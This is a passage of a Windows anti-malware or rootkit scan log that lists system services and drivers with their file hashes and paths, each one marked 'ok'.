21:37:14.0349 0x1ac0 diagnosticshub.standardcollector.service - ok
21:37:14.0395 0x1ac0 [ 3835D0DD7A932266CC0746FDC5EC5568, 9F0933698C94FB51960818D20DAF2EE7530EA77DCA6E30603EEE85B60D807891 ] DiagTrack C:\WINDOWS\system32\diagtrack.dll
21:37:14.0489 0x1ac0 DiagTrack - ok
21:37:14.0489 0x1ac0 [ 1203EA16F36C5BEB2509FB7CC03DC178, 195209CB711E5BDE24A50C88AA62F32E8AE26F6A83B423374FCA41444F55D1CE ] Disk C:\WINDOWS\system32\drivers\disk.sys
21:37:14.0505 0x1ac0 Disk - ok
21:37:14.0505 0x1ac0 [ 626E3564A7588139DE2367E14F8CAAB2, 472530B6DD70F4A5E61A8572B0479A6DF3BE8B4DD1E021BF00D05B3553927463 ] DmEnrollmentSvc C:\WINDOWS\system32\Windows.Internal.Management.dll
21:37:14.0552 0x1ac0 DmEnrollmentSvc - ok
21:37:14.0567 0x1ac0 [ 038B8B76284BC291EC75B005BB3EB13F, FE7BD7CF833C4A96ABF4FD6EBAB829CC4D8096780A22A313035D7E49BBA12D36 ] dmvsc C:\WINDOWS\System32\drivers\dmvsc.sys
21:37:14.0583 0x1ac0 dmvsc - ok
21:37:14.0583 0x1ac0 [ 32C76DFE2586EBECFFA4112E9196591C, 190C294F50B96B13D0B776F7C19DCB47EAACBEE999CBA50236CF8C856CF38B17 ] dmwappushservice C:\WINDOWS\system32\dmwappushsvc.dll
21:37:14.0599 0x1ac0 dmwappushservice - ok
21:37:14.0614 0x1ac0 [ FC3AA34608A69BDAC67E31FB70C8A720, 38815F527DF963B4A7D93895776DDD618BD29782B1FA74EB1A7319AE58739A06 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
21:37:14.0630 0x1ac0 Dnscache - ok
21:37:14.0630 0x1ac0 [ F08CB37830A1F9950E8B2F7B1F78CC7E, E4E75645893597F6A02B98DC4F126A664F5DEF7B1CD4C2DEE5CA8ED18DB64C9C ] dot3svc C:\WINDOWS\System32\dot3svc.dll
21:37:14.0645 0x1ac0 dot3svc - ok
21:37:14.0661 0x1ac0 [ 3425E26D0A7792F2EE7745C0336C2062, 54A3AFFC31C2641BCE1877F2CBA61D2CD7191BA39FD5B3659491E4E307570C1E ] DPS C:\WINDOWS\system32\dps.dll
21:37:14.0677 0x1ac0 DPS - ok
21:37:14.0677 0x1ac0 [ 3D934A1C02EB6979CF45C70A71F580EC, 279B325E18ABF82FF523095D8D5958A3A48C7B7A4F64BD562DDED1D0662B608A ] drmkaud C:\WINDOWS\system32\DRIVERS\drmkaud.sys
21:37:14.0692 0x1ac0 drmkaud - ok
21:37:14.0692 0x1ac0 [ 5E92CB292D676634058E6C62653C9227, CE35C51B444664641306B4C2E21978B3418B58B2A973B19B908D86FE723FB4C4 ] DsmSvc C:\WINDOWS\System32\DeviceSetupManager.dll
21:37:14.0708 0x1ac0 DsmSvc - ok
21:37:14.0724 0x1ac0 [ E479C2656A3A47F5D4FAD10AE6EAED52, B17D18D5440CF131EEADA385989A8ED0DB7728CAAC4E745720947DD1BC4F9EF6 ] DsSvc C:\WINDOWS\System32\DsSvc.dll
21:37:14.0739 0x1ac0 DsSvc - ok
21:37:14.0755 0x1ac0 [ 682D7DF9704217DD8716307F9E2EEC05, A8D36414A7316C59995CF9689DD84B2FD3FECE47E39F515C81BC3C439890E993 ] DusmSvc C:\WINDOWS\System32\dusmsvc.dll
21:37:14.0802 0x1ac0 DusmSvc - ok
21:37:14.0849 0x1ac0 [ F5DFB6D800946ADE35C71BE9928098A9, 7B187EC9CCA233C16C9F98F9CFFB1A85A42FC79C652B26C8FED40890F11871F3 ] DXGKrnl C:\WINDOWS\System32\drivers\dxgkrnl.sys
21:37:14.0927 0x1ac0 DXGKrnl - ok
21:37:14.0942 0x1ac0 [ B3B6BE0C21B3CF9DA5FEE9E999B1F4A0, F660FA54D9282A1BF0AD22B7432F1EDC14C675C0B23653728B6A74256D0BAA6B ] e1dexpress C:\WINDOWS\system32\DRIVERS\e1d62x64.sys
21:37:15.0036 0x1ac0 e1dexpress - ok
21:37:15.0036 0x1ac0 [ ECA1628436628362856ACF239E6AFD29, 19051DC348918B863E0A272CF56891B8CB49E7E705B8BAC7663D36C797A7B962 ] EapHost C:\WINDOWS\System32\eapsvc.dll
21:37:15.0083 0x1ac0 EapHost - ok
21:37:15.0208 0x1ac0 [ D64CD3AE93125EDA383190C2AF607E70, 3D180B96C6A2318842FA03AE5F703320A93CF1F440FF7D0E6F6F9BAD98F2FA02 ] ebdrv C:\WINDOWS\system32\drivers\evbda.sys
21:37:15.0333 0x1ac0 ebdrv - ok
21:37:15.0333 0x1ac0 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] EFS C:\WINDOWS\System32\lsass.exe
21:37:15.0349 0x1ac0 EFS - ok
21:37:15.0349 0x1ac0 [ FFBB37982E6D24AEC7A2E5459098EAC9, E89DD74540088ECAC9E802D7A059C0A6E3E5412BD42E5E9F26258724458EF8DB ] EhStorClass C:\WINDOWS\system32\drivers\EhStorClass.sys
21:37:15.0364 0x1ac0 EhStorClass - ok
21:37:15.0364 0x1ac0 [ ABF38D02E01D6ED87AE1DF65FC5DF62D, 57D48609DA30F60016D2ADEB9A772942FB39A117247EB63FAE3FCF50D726B698 ] EhStorTcgDrv C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys
21:37:15.0380 0x1ac0 EhStorTcgDrv - ok
21:37:15.0380 0x1ac0 [ 5E4AB60D50F368A09275F4055D621EDC, C840F5DF3C0813EC6CB9BA0C3C91F2C6410227A6255DEF5FA94C8AC1E43E36A0 ] embeddedmode C:\WINDOWS\System32\embeddedmodesvc.dll
21:37:15.0395 0x1ac0 embeddedmode - ok
21:37:15.0395 0x1ac0 [ CA966CED8970A60FB00A3592564EF093, 4BD904032445235EE69DAA0024E0FB3D8B2325D897A683E334754EB3CA90AB39 ] EntAppSvc C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
21:37:15.0427 0x1ac0 EntAppSvc - ok
21:37:15.0427 0x1ac0 [ B9A59B4AD516E38C39FA416398B96CCB, 4630A9AD414476B47F634F2EB5659597797222A8938B68847B97FECCE1A1B5F8 ] ErrDev C:\WINDOWS\System32\drivers\errdev.sys
21:37:15.0442 0x1ac0 ErrDev - ok
21:37:15.0458 0x1ac0 [ 1541374239F33512D7F4D24ED1E9238C, 8B1548D4052A72175EB6ADA9FD4286ACD5041E1CE071DCAC3760BB227FCD3621 ] EventSystem C:\WINDOWS\system32\es.dll
21:37:15.0489 0x1ac0 EventSystem - ok
21:37:15.0505 0x1ac0 [ 30FBA772B6963ADA4DE738FC8977611B, A8D3BFA43CE547765CDB475BC88E7153DA4A4215CC577EDFF8DA0AC1B025F654 ] EvtEng C:\Program Files\Intel\WiFi\bin\EvtEng.exe
21:37:15.0520 0x1ac0 EvtEng - ok
21:37:15.0520 0x1ac0 [ 9C4D88E8614487AD85A6F18A71A7298F, EE6F48C89D6379C7361484EAE7C7FAAA477D48032BFDD0D363E48642E62EADF4 ] exfat C:\WINDOWS\system32\drivers\exfat.sys
21:37:15.0552 0x1ac0 exfat - ok
21:37:15.0552 0x1ac0 [ C61014A176ECAAF97589E6FC979CE786, FB913AC647B68DB9854367BB1E53A504A85833966211279C8D7171698F743B27 ] fastfat C:\WINDOWS\system32\drivers\fastfat.sys
21:37:15.0567 0x1ac0 fastfat - ok
21:37:15.0583 0x1ac0 [ ECC5AEFEA31F1A078E954305B8CA6373, 15948D017E3B52D3B4BBEC047F963BD77247E24A59F0532B6A023B0C4159FC84 ] Fax C:\WINDOWS\system32\fxssvc.exe
21:37:15.0614 0x1ac0 Fax - ok
21:37:15.0614 0x1ac0 [ 853081957BA148F38FD8DE4390CFCF4A, 37C92C7ABA55A5FF7094F77F8EBEEE1F4BEE161CEC6B01A50FC0D0C39E36C142 ] fdc C:\WINDOWS\System32\drivers\fdc.sys
21:37:15.0630 0x1ac0 fdc - ok
21:37:15.0645 0x1ac0 [ 885C06C35CC8FAEDDE3CDA36B72CA2A9, FF6584E7AF2FB540B2183665C3E216BE98DE953CEA6A7E4C5F13514BE4AAC9D3 ] fdPHost C:\WINDOWS\system32\fdPHost.dll
21:37:15.0661 0x1ac0 fdPHost - ok
21:37:15.0661 0x1ac0 [ 367E878C79D9F391E3D53B6BBC1B6386, 739D89F6954E17B73F53702CFF8EE985FB241255D962A83BAF1A20E783CAF466 ] FDResPub C:\WINDOWS\system32\fdrespub.dll
21:37:15.0677 0x1ac0 FDResPub - ok
21:37:15.0677 0x1ac0 [ 514F6A0B83527DD6ACCC8B21A57B10E3, EA3D401E42D05BA39E5874513DFB895A086BECE4D69FC1AC12F85F326A435A4B ] fhsvc C:\WINDOWS\system32\fhsvc.dll
21:37:15.0692 0x1ac0 fhsvc - ok
21:37:15.0692 0x1ac0 [ 27E764D6460504B7271AFECE7A59FB76, A32B08142068BF042B3E47C0CA7F4FCFD07A37807B1B8DAAE614F3A132475D52 ] FileCrypt C:\WINDOWS\system32\drivers\filecrypt.sys
21:37:15.0708 0x1ac0 FileCrypt - ok
21:37:15.0708 0x1ac0 [ 3D6087F51110F3CC0DA89385354F8C5E, 49FF976C3391A257BCD4B048BF6D1273F8537005E32D65E5F272AF3294639F05 ] FileInfo C:\WINDOWS\system32\drivers\fileinfo.sys
21:37:15.0724 0x1ac0 FileInfo - ok
21:37:15.0724 0x1ac0 [ 057E95E53C38260C4EF49B3A077770CD, 7008E71663046FF1D91D9DC3570094561C812067E1CA07715A1D2E4F787207AE ] Filetrace C:\WINDOWS\system32\drivers\filetrace.sys
21:37:15.0739 0x1ac0 Filetrace - ok
21:37:15.0771 0x1ac0 [ 8645F91F40B8D022C9AC3DABDF360A6B, 4F83080B1273C92470EB90D80B32056C913240DCC9C4C50B7BE85254066D654D ] FlexNet Licensing Service 64 C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
21:37:15.0833 0x1ac0 FlexNet Licensing Service 64 - ok
21:37:15.0833 0x1ac0 [ 90B2983D8495C26345A1DC5F0C3BB07B, 50D834D40C27EEF5023556A77B13D3335789333E302A73DF221CD86D156FDEE9 ] flpydisk C:\WINDOWS\System32\drivers\flpydisk.sys
21:37:15.0849 0x1ac0 flpydisk - ok
21:37:15.0864 0x1ac0 [ A84261F75F490E45CFEDBA77EFE4F67E, 292BA04D8996140255E4B6105015C2A640890BEFB6C022E30E0D9CBF45D5F4DB ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
21:37:15.0880 0x1ac0 FltMgr - ok
21:37:15.0880 0x1ac0 fmqwrnmc - ok
21:37:15.0927 0x1ac0 [ 4255A21E89EFEDD8488E3ED81A9F7993, CA918E83A204A38C022A8EF28ACBF4575CEA39EED04FC739C5AD9BC464FF1753 ] FontCache C:\WINDOWS\system32\FntCache.dll
21:37:16.0036 0x1ac0 FontCache - ok
21:37:16.0036 0x1ac0 [ B282011D13BBEEA0273DF33C5E776D55, B4AF068BBB09D0F546F5590FCDD745250CFD58DD3A8ABF5DC26670FA32D181FB ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
21:37:16.0052 0x1ac0 FontCache3.0.0.0 - ok
21:37:16.0052 0x1ac0 [ 8E0A89C8BC29F4B066B1DA4B96A63609, 1F4ABEC209ECDCA20620C7D7DB0C407F8D1032D506259B11FEAF2A0C3E14B1A3 ] FrameServer C:\WINDOWS\system32\FrameServer.dll
21:37:16.0083 0x1ac0 FrameServer - ok
21:37:16.0099 0x1ac0 [ D2814848206DFC18EB8D3D069FAE703E, A62263CDF9261B692423473F4FF23B01AC864C05850BA5591EB9019906B4A08B ] FsDepends C:\WINDOWS\system32\drivers\FsDepends.sys
21:37:16.0099 0x1ac0 FsDepends - ok
21:37:16.0099 0x1ac0 [ AE7EDF845F41ACA3B74567C3CE20E987, 6159C227C85912B03D8C35A1EF91705AE6C1C23C7228D6FCC0A9529844798E1B ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
21:37:16.0114 0x1ac0 Fs_Rec - ok
21:37:16.0130 0x1ac0 [ FF0699483185CE3B4E1144DF19AC5E97, 9BA0A2F04A1A51AFC3B830452AC75BE2D76300BAF1918BCF5AB60E4EB9888F0F ] fvevol C:\WINDOWS\system32\DRIVERS\fvevol.sys
21:37:16.0145 0x1ac0 fvevol - ok
21:37:16.0161 0x1ac0 [ 4616F61E24B3AEA6E0E4EA7D69531EF4, 34CB16F68E4A4D19346C7FEC29BB5FE09BAAEC19EA730C9B93450F940D124D49 ] gencounter C:\WINDOWS\System32\drivers\vmgencounter.sys
21:37:16.0177 0x1ac0 gencounter - ok
21:37:16.0177 0x1ac0 [ 23174BB6937459B924BB8EF667FB28EF, 6675B87F4DE9CCA96B6BAB9F77C4E0B377828613D9FFB03F7D443AF11321F157 ] genericusbfn C:\WINDOWS\System32\drivers\genericusbfn.sys
21:37:16.0192 0x1ac0 genericusbfn - ok
21:37:16.0192 0x1ac0 [ 4B11CFBE1D9B73A9D865F6AB26F800BA, BD76CB5AF0EE6DD404875A4C36622C6BC8CCF2975C47E28DD305EB041C6C0B91 ] GPIOClx0101 C:\WINDOWS\system32\Drivers\msgpioclx.sys
21:37:16.0208 0x1ac0 GPIOClx0101 - ok
21:37:16.0224 0x1ac0 [ CF22C0941409C772AA1568DC4F89A111, ED5895F024E64B672EB3FAE6C456FA0D30A068CF2B475A7EE988DEA4DCD6D8DE ] gpsvc C:\WINDOWS\System32\gpsvc.dll
21:37:16.0302 0x1ac0 gpsvc - ok
21:37:16.0317 0x1ac0 [ 3FC3FCF557D0BE3D724EA10642E1F6FF, 744D0DDE748A1B681087668CB893F9A60A2BBE80A71098944E75B6A9AA934C82 ] GpuEnergyDrv C:\WINDOWS\system32\drivers\gpuenergydrv.sys
21:37:16.0364 0x1ac0 GpuEnergyDrv - ok
21:37:16.0364 0x1ac0 [ DD1A6F4998E7E21564FA9BAFE21C87ED, CAD04E9B8244ACA3314C6FD4422BE7A3B578AF1E61F13773A2C5DB388B3337F6 ] HDAudBus C:\WINDOWS\System32\drivers\HDAudBus.sys
21:37:16.0380 0x1ac0 HDAudBus - ok
21:37:16.0396 0x1ac0 [ 9F90819E301C70A3A042FC05D3E41B5F, D2175786775D08686264001ABAA4B61DC08A847666F6B9A2A64D10BFC022F646 ] HidBatt C:\WINDOWS\System32\drivers\HidBatt.sys
21:37:16.0411 0x1ac0 HidBatt - ok
21:37:16.0411 0x1ac0 [ 3CA3244C45B25F3B3ED9445C195E40EB, 9C43B31DAB473D29069D0D6BC130660424FE2414BA519107641FA1561C10C76D ] HidBth C:\WINDOWS\System32\drivers\hidbth.sys
21:37:16.0427 0x1ac0 HidBth - ok
21:37:16.0442 0x1ac0 [ 55DAF856F9633DD2519BA4E942870F02, 5283548CB93EB46C5FD3B08E45C97BBFB33D47F11F89560508775889FBF2F754 ] hidi2c C:\WINDOWS\System32\drivers\hidi2c.sys
21:37:16.0458 0x1ac0 hidi2c - ok
21:37:16.0458 0x1ac0 [ E34216A190D9BF8EAA666F6903BCD0EF, DA8529DAF903B447CC5FF2D112F670696549A4B66F54DF9A8C8C615D969CD477 ] hidinterrupt C:\WINDOWS\System32\drivers\hidinterrupt.sys
21:37:16.0474 0x1ac0 hidinterrupt - ok
21:37:16.0474 0x1ac0 [ 852DBB5185996AD8C73872A43A453729, 8C20331AE99E280799407CC5FCF88F8F645C331604230876A2CD7C253B9BD633 ] HidIr C:\WINDOWS\System32\drivers\hidir.sys
21:37:16.0489 0x1ac0 HidIr - ok
21:37:16.0505 0x1ac0 [ 6339CC87F0F610D1575C9A419940602A, B2A054ED0B669FA54E250EC2926955B1D944FA1FB2AF5B590C181CB2E9D297BA ] hidserv C:\WINDOWS\system32\hidserv.dll
21:37:16.0521 0x1ac0 hidserv - ok
21:37:16.0521 0x1ac0 [ C1A608120DE0DF52E51B8BAF86AF19F9, F3529822E78CFCA2E323A75926A833529889E40BB9602B287CC343C496CB2062 ] HidUsb C:\WINDOWS\System32\drivers\hidusb.sys
21:37:16.0552 0x1ac0 HidUsb - ok
21:37:16.0552 0x1ac0 [ BD1CF47172B97707DFC66ADA741AE2BE, 9607AB7074FC54D88FDF6E2A31506BCF8ECBF8FD651BB5CEA2421471C24BCED1 ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll
21:37:16.0614 0x1ac0 HomeGroupListener - ok
21:37:16.0661 0x1ac0 [ A004895B838003BAE2281DAF193B6A09, 587FCDCEF769B2AED12551B6426477B764CB8A025E692D4EC8B24E1CBA1C06E3 ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll
21:37:16.0708 0x1ac0 HomeGroupProvider - ok
21:37:16.0724 0x1ac0 [ 8ADD9CA3E0F18CEA11EA6FAED794A228, B46BA885ED8253A253B1C87C331CA145F7F397AF49853038B3F1EDAF81B2C4BA ] HpSAMD C:\WINDOWS\system32\drivers\HpSAMD.sys
21:37:16.0739 0x1ac0 HpSAMD - ok
21:37:16.0755 0x1ac0 [ 2413454E305678EA9A486E8DE2E67849, 5E821E909F99BAB782D89A0CDBFAE5474FEA211EB4F626A824D10D733F3FDC67 ] HTTP C:\WINDOWS\system32\drivers\HTTP.sys
21:37:16.0786 0x1ac0 HTTP - ok
21:37:16.0802 0x1ac0 [ D3C45F1B5BB3EE772CDA416A4A3EEB9B, 97CD988CF307EBCC34F37F130F4F2C989DD17E70B2498DB1929B566A3387887B ] HvHost C:\WINDOWS\System32\hvhostsvc.dll
21:37:16.0802 0x1ac0 HvHost - ok
21:37:16.0817 0x1ac0 [ F60F8390B635156593F7493AE898AFB0, AC5E58CDA12072C5FDBFEA0FA009CE2E251D143FC0878B2658ECCCF797B8B0EC ] hvservice C:\WINDOWS\system32\drivers\hvservice.sys
21:37:16.0817 0x1ac0 hvservice - ok
21:37:16.0817 0x1ac0 [ 563F5FC3B46A70A91AB6C8822AC8BF25, 43E647A7752D7444BF306E38571130AB778AA2A6892782C6C1112E47FBEFBC87 ] hwpolicy C:\WINDOWS\system32\drivers\hwpolicy.sys
21:37:16.0833 0x1ac0 hwpolicy - ok
21:37:16.0833 0x1ac0 [ C082249BC3E972C8A132D9EC6AD9EAD5, D69EEFD97CF5E0BD64D11DE1C331D02A9BE522BB93A40FF32ED434D960B85D39 ] hyperkbd C:\WINDOWS\System32\drivers\hyperkbd.sys
21:37:16.0849 0x1ac0 hyperkbd - ok
21:37:16.0849 0x1ac0 [ C6C8315E3262FAE460529C6DA2951682, 4ADBFA6601209BF6F5A9797721CBE2011905775CF4E266D7B42F89915D477E95 ] i8042prt C:\WINDOWS\System32\drivers\i8042prt.sys
21:37:16.0864 0x1ac0 i8042prt - ok
21:37:16.0864 0x1ac0 [ C6B8743B213F06AA60943D8366FE968F, 758954F70B810063914B243115B2C753B2BCE40190F95C30ACBA0BF04EBD5B33 ] iagpio C:\WINDOWS\System32\drivers\iagpio.sys
21:37:16.0880 0x1ac0 iagpio - ok
21:37:16.0880 0x1ac0 [ 9A2A2F3C69B9A30B6E78536F6D258BAD, 5E28E132A7300E6F5E0C6439D6BA00F1AEF66D729FF671FDA91274A25A921463 ] iai2c C:\WINDOWS\System32\drivers\iai2c.sys
21:37:16.0896 0x1ac0 iai2c - ok
21:37:16.0911 0x1ac0 [ 42962355A7911407026E920E7252E3E5, 4A4016A53ED61354C81C594968339E6F3CCCFF4A64F8F28AD008ED8137E05AD2 ] iaLPSS2i_GPIO2 C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys
21:37:16.0911 0x1ac0 iaLPSS2i_GPIO2 - ok
21:37:16.0927 0x1ac0 [ BD47B2FEABFA48C6224D43EE9EA9BC06, 304628CA458AA7B1B8B1CFF12074AD75C1CE7BD41820B99607D7FA99A817D007 ] iaLPSS2i_GPIO2_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys
21:37:16.0927 0x1ac0 iaLPSS2i_GPIO2_BXT_P - ok
21:37:16.0942 0x1ac0 [ 2184CB3A65888F446FCD6DBA9F073F4C, 0B3D63EC7F61BFAD490C123084965A9F38DBFE587AC9DAE6F4E6B68AD8093DB2 ] iaLPSS2i_I2C C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys
21:37:16.0942 0x1ac0 iaLPSS2i_I2C - ok
21:37:16.0958 0x1ac0 [ 4126F8DA08CE7924A3AE6F7235F85D5F, 668DC1D09496A95F44C07C5C1F6ED7D3EFC6F89523B2744A86B460E5BECAEFB5 ] iaLPSS2i_I2C_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys
21:37:16.0974 0x1ac0 iaLPSS2i_I2C_BXT_P - ok
21:37:16.0974 0x1ac0 [ 16A10CCEDCF5AC4CAAE43DC9FC40392F, F77696AE55B992154A3B35F7660BD73E0AB35A6ECEEC1931C0D35748CFA605C0 ] iaLPSSi_GPIO C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys
21:37:16.0974 0x1ac0 iaLPSSi_GPIO - ok
21:37:16.0989 0x1ac0 [ EB82A11613326691508D9ED9A4FE29E7, 8445E41BAB21964C7F014742795E462BDDC6C37A261990B3D6BF4E637A719547 ] iaLPSSi_I2C C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys
21:37:17.0005 0x1ac0 iaLPSSi_I2C - ok
21:37:17.0021 0x1ac0 [ 12859E1215AA083A42E7ADCDE5C061D1, 262F9C65C3FA7EB69C4FA7C6547E1C79DB49697A083309909BC78726A116557F ] iaStorA C:\WINDOWS\system32\drivers\iaStorA.sys
21:37:17.0052 0x1ac0 iaStorA - ok
21:37:17.0067 0x1ac0 [ D820075D3395BED28FC57AEF8FBA666F, 7589CCCD355D2685C0E6D317AB39F0DB061153E6859A0F53834B001643CFDF57 ] iaStorAV C:\WINDOWS\system32\drivers\iaStorAV.sys
21:37:17.0099 0x1ac0 iaStorAV - ok
21:37:17.0099 0x1ac0 [ A243E0CE8644378C9A9D015ABC3EDA27, 0C72F6D39DD64A16F54BCE185F4D8E670D386823F6364E9ED284F7F8DE11CBF5 ] iaStorV C:\WINDOWS\system32\drivers\iaStorV.sys
21:37:17.0130 0x1ac0 iaStorV - ok
21:37:17.0146 0x1ac0 [ E16E4FC9F250E48CB2CAD93E59D010E2, EFF558EDD63DB0FD8BA240E94BD5999106233B95BF86BFB99EE9B897F41C542B ] ibbus C:\WINDOWS\System32\drivers\ibbus.sys
21:37:17.0177 0x1ac0 ibbus - ok
21:37:17.0177 0x1ac0 [ 053DFE4E6324B828C16CB6F5B9F20790, 17347896126DE49C570D2AC025F2A4BB8250B67ECD6A6D31B80EBD9423799F0B ] IBMPMDRV C:\WINDOWS\system32\DRIVERS\ibmpmdrv.sys
21:37:17.0177 0x1ac0 IBMPMDRV - ok
21:37:17.0192 0x1ac0 [ D84EF85ED4F2044784A44C211A27D065, FA18EA57507353DC3DB18F840F0499D7874AC055E3190E4D76DB9AA1021FC674 ] IBMPMSVC C:\WINDOWS\system32\ibmpmsvc.exe
21:37:17.0192 0x1ac0 IBMPMSVC - ok
21:37:17.0208 0x1ac0 ibtsiva - ok
21:37:17.0208 0x1ac0 [ 18F7B1E3C5DE1CC8B3D2BBF90F7350EF, 750BB014CD290988D949FC566828B126D9A5B9D04EDF9E124680ECFFBC97D7AF ] ibtusb C:\WINDOWS\system32\DRIVERS\ibtusb.sys
21:37:17.0255 0x1ac0 ibtusb - ok
21:37:17.0255 0x1ac0 [ E3061D5ABA80394D29E26EA58AF7F69A, 9BCF1AD2CC9C7E48FD350F9D59797E17F355C840EDE428143764F93716159C20 ] icssvc C:\WINDOWS\System32\tetheringservice.dll
21:37:17.0271 0x1ac0 icssvc - ok
21:37:17.0411 0x1ac0 [ 658287D76E8D77C08AE98989F99B8948, DBA67B5772E1FE43ABDB3908A1CF86D76F2774BABC20359D2511F06A2A8CAC57 ] igfx C:\WINDOWS\system32\DRIVERS\igdkmd64.sys
21:37:17.0567 0x1ac0 igfx - ok
21:37:17.0583 0x1ac0 [ A105AD05696D55E6E4F078ED850F6305, 8121A4226D2941EDD4809D516E7684E5C7164ADCF5AA4C8BC6620110625D3E8D ] igfxCUIService2.0.0.0 C:\WINDOWS\system32\igfxCUIService.exe
21:37:17.0599 0x1ac0 igfxCUIService2.0.0.0 - ok
21:37:17.0614 0x1ac0 [ E9E4BB312F6B544392F44D513FAA2243, 3E6917BCE9F1AF554D57FED9E76B33F36D92145B0090A5F8F64E2A53EB4C54A4 ] IKEEXT C:\WINDOWS\System32\ikeext.dll
21:37:17.0661 0x1ac0 IKEEXT - ok
21:37:17.0661 0x1ac0 [ 8A268094274301F2673D0D656BF763E5, 7633741B393D4A3151425D4FBB0C0EB9D5E2B31A707710E23F4B749C08248C54 ] ImControllerService C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
21:37:17.0661 0x1ac0 ImControllerService - ok
21:37:17.0661 0x1ac0 [ 0E33BC018502E7FDE77C343055D9C626, CD1C60E8EDAA044E03E5776962E091C1288204033A57A799D446F9B058D6AD59 ] IndirectKmd C:\WINDOWS\System32\drivers\IndirectKmd.sys
21:37:17.0677 0x1ac0 IndirectKmd - ok
21:37:17.0802 0x1ac0 [ C703E251B977F41231E28F45DE7A7A56, 144B7F374679EABB149A9E907C45EE7C77A18D1A15F6714635558026ADBBE2BD ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys
21:37:17.0896 0x1ac0 IntcAzAudAddService - ok
21:37:17.0911 0x1ac0 [ E300D1E37B737ED14F7A08CD5604E5D9, 5C1135081E29D7F4A97D5CAA2C8FBE1DD04EC7A3D8E648E69F2AA9EBDD88EBBB ] IntcDAud C:\WINDOWS\system32\DRIVERS\IntcDAud.sys
21:37:17.0927 0x1ac0 IntcDAud - ok
21:37:17.0942 0x1ac0 [ AE32376564771525DCDD2F0280619E1A, 233B7B272DCD9080DE7C9593EB7993745D1037EA87B69617E7176F074DFD5968 ] Intel(R) Capability Licensing Service TCP IP Interface C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
21:37:18.0083 0x1ac0 Intel(R) Capability Licensing Service TCP IP Interface - ok
21:37:18.0083 0x1ac0 [ 72586E6D6DD4144D0C4CBD9D2653BBED, 3EE3CBB98D7A2CEEC92A86D5D2F49733BB1FD42F45CDE8973B71022E57093BBA ] IntelHSWPcc C:\WINDOWS\system32\drivers\IntelPcc.sys
21:37:18.0099 0x1ac0 IntelHSWPcc - ok
21:37:18.0099 0x1ac0 [ 4B7F8A1AAC7172DB6918A0E10E1D78A3, 1E9922AF9B5458F23A379EDCD61B615B6E53BAF8927237C1C7DCC04122CCF417 ] intelide C:\WINDOWS\system32\drivers\intelide.sys
21:37:18.0099 0x1ac0 intelide - ok
21:37:18.0114 0x1ac0 [ 0A3DBE89C965FFB7C0D0E38834E77B90, 0166BE79228ED6B3D7AA1BACB4F1BB68357DBF70DF778B2F8A3776E374EE690C ] intelpep C:\WINDOWS\system32\drivers\intelpep.sys
21:37:18.0114 0x1ac0 intelpep - ok
21:37:18.0130 0x1ac0 [ 64EC687A811DC4F69DF3816F073352AA, F70942B67448DF9848F32F88D37E1E0C548CE9FEFC4376628D7CBEF62494D8E1 ] intelppm C:\WINDOWS\System32\drivers\intelppm.sys
21:37:18.0130 0x1ac0 intelppm - ok
21:37:18.0146 0x1ac0 [ 549C278119FF539C3B219C55B98B0E87, B4C15AB0C77EAB6C5ADEBD014F610BBFC537EAEB0E3960636624001C8A5DE56E ] iorate C:\WINDOWS\system32\drivers\iorate.sys
21:37:18.0146 0x1ac0 iorate - ok
21:37:18.0146 0x1ac0 [ A0F9F2E87F0C751FE164D90EB44A9B63, BE816F17E43E5F80AC65E913AB7F9E77B8D6B70B90A784CB00C907D3DAFFD4DB ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
21:37:18.0161 0x1ac0 IpFilterDriver - ok
21:37:18.0192 0x1ac0 [ 57A93FCF94FAB8C2161335E56C81CD16, 4A642E4FF70DA209074B78EC50B76A024DB5D01B8C9FCC405A64AF0F1A7EA389 ] iphlpsvc C:\WINDOWS\System32\iphlpsvc.dll
21:37:18.0271 0x1ac0 iphlpsvc - ok
21:37:18.0271 0x1ac0 [ 656DDB34996A96539BA6E2843B5F2A77, EDC3F1A2BA38A9655361A20B6C8001984AEB1A530C5385CF6EC0AF595305DBC7 ] IPMIDRV C:\WINDOWS\System32\drivers\IPMIDrv.sys
21:37:18.0286 0x1ac0 IPMIDRV - ok
21:37:18.0286 0x1ac0 [ DCC05E5EAA580C97F13B434FAFACED85, 5C6CFD3D9FAEB7274E05F3D19D3AA064624500C616650DE227B849B505662BB4 ] IPNAT C:\WINDOWS\system32\drivers\ipnat.sys
21:37:18.0302 0x1ac0 IPNAT - ok
21:37:18.0302 0x1ac0 [ 9A6B993A95CCA15502DE3C980508DC44, 370A1A4531A72CFBF331ED274913925A269115A13E3A6B5E1821FB48DD7242AE ] IpxlatCfgSvc C:\WINDOWS\System32\IpxlatCfg.dll
21:37:18.0317 0x1ac0 IpxlatCfgSvc - ok
21:37:18.0333 0x1ac0 [ 9035C10C7EB8CF7C87CEA82A62EBB43A, A0DA94E80E503DB3C2877CE1BCDC70B3FCC6861ADFBCCE66C6D2592BD63F27DC ] irda C:\WINDOWS\system32\drivers\irda.sys
21:37:18.0364 0x1ac0 irda - ok
